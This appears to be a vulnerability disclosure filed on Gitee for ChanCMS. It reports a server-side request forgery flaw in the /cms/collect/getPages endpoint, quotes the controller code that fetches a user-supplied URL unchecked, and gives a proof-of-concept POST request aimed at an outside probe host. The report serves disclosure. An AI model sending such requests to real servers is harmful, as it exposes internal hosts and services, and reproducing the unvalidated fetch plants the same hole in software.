SSRF vulnerability on /cms/collect/getPages

### Summary

In the network access functionality, the target URL is user-controllable and lacks sufficient security handling, thus allowing attackers to exploit SSRF vulnerabilities to access internal hosts and services.

### Details

- app\modules\api\controller\collect.js
```
class CollectController {
  model = "collect";

async getPages(req, res, next) {
    try {
      let arr = [];
      const { targetUrl, listTag, charset } = req.body;
      const data = await collect.common(targetUrl, charset);
      const $ = cheerio.load(data.toString(), { decodeEntities: false });
      $(`${listTag}`).each(function () {
        arr.push($(this).attr("href"));
      });
      res.json({ ...success, data: arr });
    } catch (error) {
      next(error);
    }
```

### PoC
```
POST /cms/collect/getPages HTTP/1.1
Host: localhost:7001
sec-ch-ua: "Chromium";v="117", "Not;A=Brand";v="8"
Accept: application/json, text/plain, */*
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
sec-ch-ua-platform: "Windows"
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:7001/public/admin/index.html
Connection: close
Content-Type: application/json
Content-Length: 61

{
    "targetUrl": "http://002b499c4f.ipv6.bypass.eu.org"
}
```
![输入图片说明](https://foruda.gitee.com/images/1752218850399178667/a5461222_8279293.png "屏幕截图")

### Impact
Here are two articles that introduce the principles and risks of SSRF for your reference.

- https://www.invicti.com/learn/server-side-request-forgery-ssrf/
- https://www.brightsec.com/blog/ssrf-attack/#types-of-ssrf-attacks

明空/ChanCMS

内容风险标识

评论 (1)

明空/ChanCMS .gitee-modal { width: 500px !important; }

内容风险标识